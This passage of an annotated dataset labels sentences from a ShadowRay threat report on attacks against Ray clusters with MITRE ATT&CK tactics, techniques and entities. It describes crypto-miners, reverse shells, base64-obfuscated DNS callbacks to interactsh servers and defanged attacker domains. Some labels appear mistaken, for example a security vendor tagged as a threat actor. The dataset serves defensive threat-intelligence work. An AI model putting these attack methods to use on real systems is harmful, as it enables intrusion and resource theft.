"Do Targeted Clusters Have Anything in Common?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s103-050d36", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "Do Targeted Clusters Have Anything in Common?", "sentence_text": "(Crypto Miners)\nMost of the clusters Oligo Research has identified and reported were already hacked with crypto-miners or reverse-shells.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "hack clusters with crypto-miners or reverse-shells", "entities": [ { "text": "crypto-miners", "start": 105, "end": 118, "label": "MalwareTool" }, { "text": "reverse-shells", "start": 122, "end": 136, "label": "MalwareTool" }, { "text": "hacked", "start": 93, "end": 99, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s104-e0b136", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "(Crypto Miners)\nMost of the clusters Oligo Research has identified and reported were already hacked with crypto-miners or reverse-shells.", "sentence_text": "We noticed some patterns along the compromised clusters, indicating that they were targeted by the same attackers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "attackers", "start": 104, "end": 113, "label": "ThreatActor" }, { "text": "compromised clusters", "start": 35, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "targeted", "start": 83, "end": 91, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s105-f7b450", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "We noticed some patterns along the compromised clusters, indicating that they were targeted by the same attackers.", "sentence_text": "Oligo Research Team has identified crypto-mining campaigns that leverage ShadowRay to hack organizations and install cryptocurrency miners of different kinds.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "leverage ShadowRay to install cryptocurrency miners", "entities": [ { "text": "cryptocurrency miners", "start": 117, "end": 138, "label": "MalwareTool" }, { "text": "ShadowRay", "start": 73, "end": 82, "label": "MalwareTool" }, { "text": "hack", "start": 86, "end": 90, "label": "Action" }, { "text": "install", "start": 109, "end": 116, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s106-4e04e0", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "Oligo Research Team has identified crypto-mining campaigns that leverage ShadowRay to hack organizations and install cryptocurrency miners of different kinds.", "sentence_text": "The first crypto-miner we noticed was installed on Feb. 21, 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s107-77b386", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "The first crypto-miner we noticed was installed on Feb. 21, 2024.", "sentence_text": "Due to the scale of the attacks and the chain of events, we believe the threat actors are probably part of a well-established hacking group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s108-832e10", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "Due to the scale of the attacks and the chain of events, we believe the threat actors are probably part of a well-established hacking group.", "sentence_text": "We uncovered crypto miners including:\nXMRig Miners\n- some of them running in a volatile manner, in-memory, without being downloaded to disk.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "XMRig Miners running in a volatile manner, in-memory, without being downloaded to disk", "entities": [ { "text": "crypto miners", "start": 13, "end": 26, "label": "MalwareTool" }, { "text": "XMRig Miners", "start": 38, "end": 50, "label": "MalwareTool" }, { "text": "running in a volatile manner, in-memory, without being downloaded to disk", "start": 66, "end": 139, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s109-bfede4", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "We uncovered crypto miners including:\nXMRig Miners\n- some of them running in a volatile manner, in-memory, without being downloaded to disk.", "sentence_text": "‍\nNBMiner\nJava-based Zephyr miners Tracing the Attackers Usually, the command line used includes the unique username AND password of the attacker.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "command line used includes the unique username AND password of the attacker", "entities": [ { "text": "attacker", "start": 137, "end": 145, "label": "ThreatActor" }, { "text": "NBMiner", "start": 2, "end": 9, "label": "MalwareTool" }, { "text": "Java-based Zephyr miners", "start": 10, "end": 34, "label": "MalwareTool" }, { "text": "command line", "start": 70, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "unique username", "start": 101, "end": 116, "label": "Infrastructure_Indicator" }, { "text": "password", "start": 121, "end": 129, "label": "Infrastructure_Indicator" }, { "text": "includes", "start": 88, "end": 96, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s110-93955f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "‍\nNBMiner\nJava-based Zephyr miners Tracing the Attackers Usually, the command line used includes the unique username AND password of the attacker.", "sentence_text": "Miners must connect to a centralized server to function.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s111-7daf95", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "Miners must connect to a centralized server to function.", "sentence_text": "The server it communicates with is also present in the command line.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "None", "entities": [ { "text": "server", "start": 4, "end": 10, "label": "Infrastructure_Indicator" }, { "text": "command line", "start": 55, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s112-4258c2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "The server it communicates with is also present in the command line.", "sentence_text": "In one example, zephyr[.]miningocean[.]org was used.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "None", "entities": [ { "text": "zephyr[.]miningocean[.]org", "start": 16, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 47, "end": 51, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s113-03a545", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "In one example, zephyr[.]miningocean[.]org was used.", "sentence_text": "Reverse Shells (Gaining Persistency)\nWe found multiple reverse shells that enabled the attackers to run arbitrary code in the production environment, and gain persistence on its machines:\nActive reverse shells Attackers open reverse shells successfully:\n‍\nAttackers are leveraging the Open-Source Service Interactsh to Evade Detection", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" }, { "id": "T1090", "name": "Proxy" } ], "procedure": "use reverse shells for code execution and persistence", "entities": [ { "text": "attackers", "start": 87, "end": 96, "label": "ThreatActor" }, { "text": "reverse shells", "start": 55, "end": 69, "label": "MalwareTool" }, { "text": "run arbitrary code", "start": 100, "end": 118, "label": "Action" }, { "text": "gain persistence", "start": 154, "end": 170, "label": "Action" }, { "text": "Attackers", "start": 256, "end": 265, "label": "ThreatActor" }, { "text": "Open-Source Service Interactsh", "start": 285, "end": 315, "label": "MalwareTool" }, { "text": "Evade Detection", "start": 319, "end": 334, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s114-a9e47e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Reverse Shells (Gaining Persistency)\nWe found multiple reverse shells that enabled the attackers to run arbitrary code in the production environment, and gain persistence on its machines:\nActive reverse shells Attackers open reverse shells successfully:\n‍\nAttackers are leveraging the Open-Source Service Interactsh to Evade Detection", "sentence_text": "The following job was inspected on a compromised ray cluster:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s115-1a6770", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "The following job was inspected on a compromised ray cluster:", "sentence_text": "The domain oast[.]fun was hiding in the payload as base64.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "hide domain in base64 payload", "entities": [ { "text": "oast[.]fun", "start": 11, "end": 21, "label": "Infrastructure_Indicator" }, { "text": "hiding", "start": 26, "end": 32, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s116-cd5ed8", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "The domain oast[.]fun was hiding in the payload as base64.", "sentence_text": "Here is the decoded payload that attackers successfully ran on the Ray clusters:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "run decoded payload on Ray clusters", "entities": [ { "text": "attackers", "start": 33, "end": 42, "label": "ThreatActor" }, { "text": "Ray clusters", "start": 67, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "successfully ran", "start": 43, "end": 59, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s117-12de8d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "Here is the decoded payload that attackers successfully ran on the Ray clusters:", "sentence_text": "The attackers tried to evade detection by using a base64 encoded Python code.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "use base64 encoded Python code to evade detection", "entities": [ { "text": "attackers", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "Python code", "start": 65, "end": 76, "label": "MalwareTool" }, { "text": "evade detection", "start": 23, "end": 38, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s118-23cf7c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 118, "context_before": "The attackers tried to evade detection by using a base64 encoded Python code.", "sentence_text": "When decoded, the Python code dispatches DNS query to a subdomain under oast[.]fun.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "Python code dispatches DNS query to a subdomain under oast[.]fun", "entities": [ { "text": "Python code", "start": 18, "end": 29, "label": "MalwareTool" }, { "text": "oast[.]fun", "start": 72, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "dispatches DNS query", "start": 30, "end": 50, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s119-ff25e6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 119, "context_before": "When decoded, the Python code dispatches DNS query to a subdomain under oast[.]fun.", "sentence_text": "We looked at the certificate history of this domain:\nand found that the first Let'sEncrypt certificate is from 2022:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s120-f69468", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 120, "context_before": "We looked at the certificate history of this domain:\nand found that the first Let'sEncrypt certificate is from 2022:", "sentence_text": "After a quick search, we understood that this domain is connected to the interactsh open source service:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "None", "entities": [ { "text": "interactsh open source service", "start": 73, "end": 103, "label": "MalwareTool" }, { "text": "connected to", "start": 56, "end": 68, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s122-5e1ec5", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 122, "context_before": "‍", "sentence_text": "The domain\noast.fun\nis one of the public servers the project maintains.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "None", "entities": [ { "text": "oast.fun", "start": 11, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "public servers", "start": 34, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "maintains", "start": 61, "end": 70, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s123-f93f66", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 123, "context_before": "The domain\noast.fun\nis one of the public servers the project maintains.", "sentence_text": "The attackers have leveraged the free public servers to avoid detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "leverage public servers to avoid detection", "entities": [ { "text": "attackers", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "leveraged", "start": 19, "end": 28, "label": "Action" }, { "text": "free public servers", "start": 33, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "avoid detection", "start": 56, "end": 71, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s124-0b6f59", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "The attackers have leveraged the free public servers to avoid detection.", "sentence_text": "When the attackers successfully execute the base64 payload using the Jobs API, a DNS query is invoked from the compromised machine to the attacker-controlled free subdomain.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.004", "name": "DNS" } ], "procedure": "execute base64 payload to invoke DNS query", "entities": [ { "text": "attackers", "start": 9, "end": 18, "label": "ThreatActor" }, { "text": "execute", "start": 32, "end": 39, "label": "Action" }, { "text": "invoked", "start": 94, "end": 101, "label": "Action" }, { "text": "base64 payload", "start": 44, "end": 58, "label": "MalwareTool" }, { "text": "Jobs API", "start": 69, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "compromised machine", "start": 111, "end": 130, "label": "Infrastructure_Indicator" }, { "text": "attacker-controlled free subdomain", "start": 138, "end": 172, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s125-daf4dd", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 125, "context_before": "When the attackers successfully execute the base64 payload using the Jobs API, a DNS query is invoked from the compromised machine to the attacker-controlled free subdomain.", "sentence_text": "By invoking the DNS query from the compromised machine, the attackers immediately received a notification about the compromised machine’s IP address:\nThe same tool is known to be used by threat actors, as mentioned in the article by Palo Alto's Unit 42:", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1016", "name": "System Network Configuration Discovery" } ], "procedure": "attackers immediately received a notification about the compromised machine’s IP address via DNS query", "entities": [ { "text": "attackers", "start": 60, "end": 69, "label": "ThreatActor" }, { "text": "threat actors", "start": 187, "end": 200, "label": "ThreatActor" }, { "text": "Palo Alto's Unit 42", "start": 233, "end": 252, "label": "ThreatActor" }, { "text": "same tool", "start": 154, "end": 163, "label": "MalwareTool" }, { "text": "DNS query", "start": 16, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "compromised machine’s IP address", "start": 116, "end": 148, "label": "Infrastructure_Indicator" }, { "text": " invoking", "start": 2, "end": 11, "label": "Action" }, { "text": "received a notification", "start": 82, "end": 105, "label": "Action" }, { "text": "used", "start": 179, "end": 183, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s126-7b4ef0", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 126, "context_before": "By invoking the DNS query from the compromised machine, the attackers immediately received a notification about the compromised machine’s IP address:\nThe same tool is known to be used by threat actors, as mentioned in the article by Palo Alto's Unit 42:", "sentence_text": "‍\nEven though Interactsh can be used for legitimate purposes, it is widely used by attackers to test malicious traffic.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "used by attackers to test malicious traffic", "entities": [ { "text": "attackers", "start": 83, "end": 92, "label": "ThreatActor" }, { "text": "Interactsh", "start": 14, "end": 24, "label": "MalwareTool" }, { "text": "malicious traffic", "start": 101, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 32, "end": 36, "label": "Action" }, { "text": "test", "start": 96, "end": 100, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s127-8fa3e0", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 127, "context_before": "‍\nEven though Interactsh can be used for legitimate purposes, it is widely used by attackers to test malicious traffic.", "sentence_text": "Its testing traffic therefore could be followed by a series of exploits.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "None", "entities": [ { "text": "exploits", "start": 63, "end": 71, "label": "Action" }, { "text": "testing traffic", "start": 4, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "followed by", "start": 39, "end": 50, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s128-d2daa4", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 128, "context_before": "Its testing traffic therefore could be followed by a series of exploits.", "sentence_text": "[16]\n‍\nWe Started Investigating the Payloads of the Reverse Shells We delved into the reverse shell payload from bit[.]ly/akuhGet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s129-0d2fd1", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 129, "context_before": "[16]\n‍\nWe Started Investigating the Payloads of the Reverse Shells We delved into the reverse shell payload from bit[.]ly/akuhGet.", "sentence_text": "The file content made it clear: The attackers tried to escalate their privileges using sudo, which was not present on the attacked machine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s130-6df955", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 130, "context_before": "The file content made it clear: The attackers tried to escalate their privileges using sudo, which was not present on the attacked machine.", "sentence_text": "The attackers used the service www[.]akuh[.]net using an open source repository.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "use www[.]akuh[.]net service", "entities": [ { "text": "attackers", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "www[.]akuh[.]net", "start": 31, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 14, "end": 18, "label": "Action" } ] }, { "uid": "mitre-89_mitre_report-p1-s131-c68e3f", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 131, "context_before": "The attackers used the service www[.]akuh[.]net using an open source repository.", "sentence_text": "‍\nVirus Total did not raise any red flags:\nIndications of Compromise (IoCs)\nIP GeoLocations:\n‍\nResponsible Disclosure\nThe Oligo research team has actively notified numerous companies through responsible disclosure while providing further details and assistance with remediation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s132-ddd1ab", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 132, "context_before": "‍\nVirus Total did not raise any red flags:\nIndications of Compromise (IoCs)\nIP GeoLocations:\n‍\nResponsible Disclosure\nThe Oligo research team has actively notified numerous companies through responsible disclosure while providing further details and assistance with remediation.", "sentence_text": "Code and Static Testing alone don’t hold the complete context about what is deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s133-ac229c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 133, "context_before": "Code and Static Testing alone don’t hold the complete context about what is deployed.", "sentence_text": "To detect Shadow Vulnerabilities, the runtime environment, which includes the exploit indicators, must be monitored continuously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s134-4f7820", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 134, "context_before": "To detect Shadow Vulnerabilities, the runtime environment, which includes the exploit indicators, must be monitored continuously.", "sentence_text": "The signs of an exploit vary, potentially triggered by specially-crafted input, loading data from untrusted sources, missing firewall rules, behavior of dependencies that are not taken into account, and more.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s135-cb1990", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 135, "context_before": "The signs of an exploit vary, potentially triggered by specially-crafted input, loading data from untrusted sources, missing firewall rules, behavior of dependencies that are not taken into account, and more.", "sentence_text": "Mitigation Strategies\nFollow the best practices for securing Ray deployments Start with running Ray within a secured, trusted environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s136-0734f2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 136, "context_before": "Mitigation Strategies\nFollow the best practices for securing Ray deployments Start with running Ray within a secured, trusted environment.", "sentence_text": "Always add firewall rules or security groups to prevent unauthorized access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s137-5a12c8", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 137, "context_before": "Always add firewall rules or security groups to prevent unauthorized access.", "sentence_text": "Add authorization on top of Ray Dashboard port (8265 by default):\nIf you do need Ray’s dashboard to be accessible, implement a proxy that adds an authorization layer to the Ray API when exposing it over the network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s138-af50cd", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 138, "context_before": "Add authorization on top of Ray Dashboard port (8265 by default):\nIf you do need Ray’s dashboard to be accessible, implement a proxy that adds an authorization layer to the Ray API when exposing it over the network.", "sentence_text": "Continuously monitor your production environments and AI clusters for anomalies, even within Ray.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s139-7ace04", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 139, "context_before": "Continuously monitor your production environments and AI clusters for anomalies, even within Ray.", "sentence_text": "Ray depends on arbitrary code execution to function .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s140-faa509", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 140, "context_before": "Ray depends on arbitrary code execution to function .", "sentence_text": "Don’t bind on 0.0.0.0 to make your life easy - It is recommended to use an IP of an explicit network interface, such as the IP that is in the subnet of your local network or a trusted private VPC/VPN.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s141-5ec8fc", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "Don’t bind on 0.0.0.0 to make your life easy - It is recommended to use an IP of an explicit network interface, such as the IP that is in the subnet of your local network or a trusted private VPC/VPN.", "sentence_text": "Don’t trust the default - Sometimes tools assume you read their docs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s143-c4705e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "Do it.", "sentence_text": "Use the right tools - The technical burden of securing open source is yours.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s144-69d73a", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "Use the right tools - The technical burden of securing open source is yours.", "sentence_text": "Don't rely on the maintainers, there are tools that can help you protect your production workloads from the risks of using open source in runtime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s145-57d790", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "Don't rely on the maintainers, there are tools that can help you protect your production workloads from the risks of using open source in runtime.", "sentence_text": "We’re also hosting a threat briefing where we’ll go over the potential impacts of ShadowRay, as well as essential mitigation steps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s146-a66a30", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "We’re also hosting a threat briefing where we’ll go over the potential impacts of ShadowRay, as well as essential mitigation steps.", "sentence_text": "Additionally, we want to thank Bishop Fox", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s148-ded0e3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "[2], Sierra Haex", "sentence_text": "[3], and Protect AI[4] for their amazing prior work on findings and for disclosing vulnerabilities responsibly.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s149-a1798b", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "[3], and Protect AI[4] for their amazing prior work on findings and for disclosing vulnerabilities responsibly.", "sentence_text": "Oligo Research Team Oligo Research Team is a group of experienced researchers who focus on new attack vectors in open source software.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s150-8df839", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "Oligo Research Team Oligo Research Team is a group of experienced researchers who focus on new attack vectors in open source software.", "sentence_text": "The team identifies critical issues and alerts Oligo customers and the technology community about their findings.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s151-a202f2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "The team identifies critical issues and alerts Oligo customers and the technology community about their findings.", "sentence_text": "An experienced software engineer and architect, Avi’s cybersecurity skills were first honed in elite Israeli intelligence units.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s152-34b1b4", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "An experienced software engineer and architect, Avi’s cybersecurity skills were first honed in elite Israeli intelligence units.", "sentence_text": "His work focuses on privacy in the age of AI and big data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s153-090171", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "His work focuses on privacy in the age of AI and big data.", "sentence_text": "Guy Kaplan\nGuy is an experienced security researcher with a love of reverse engineering and learning new technologies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s154-59aa54", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "Guy Kaplan\nGuy is an experienced security researcher with a love of reverse engineering and learning new technologies.", "sentence_text": "Gal Elbaz\nGal Elbaz is the Co-Founder and CTO at Oligo Security, bringing over a decade of expertise in vulnerability research and ethical hacking.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s155-8828a6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "Gal Elbaz\nGal Elbaz is the Co-Founder and CTO at Oligo Security, bringing over a decade of expertise in vulnerability research and ethical hacking.", "sentence_text": "Gal started his career as a security engineer in the IDF's elite intelligence unit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s156-e14619", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "Gal started his career as a security engineer in the IDF's elite intelligence unit.", "sentence_text": "References\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\nexpert tips\nAvi Lumelsky\nAI Security Researcher Avi Lumelsky is a security researcher specializing in engineering and AI.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s157-891037", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 157, "context_before": "References\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\n‍\nexpert tips\nAvi Lumelsky\nAI Security Researcher Avi Lumelsky is a security researcher specializing in engineering and AI.", "sentence_text": "At Oligo Security, he secures AI infrastructure by uncovering vulnerabilities in open-source projects.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s158-68bbb8", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "At Oligo Security, he secures AI infrastructure by uncovering vulnerabilities in open-source projects.", "sentence_text": "Previously at Deci AI (now part of NVIDIA), he focused on model optimization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s159-c3363c", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "Previously at 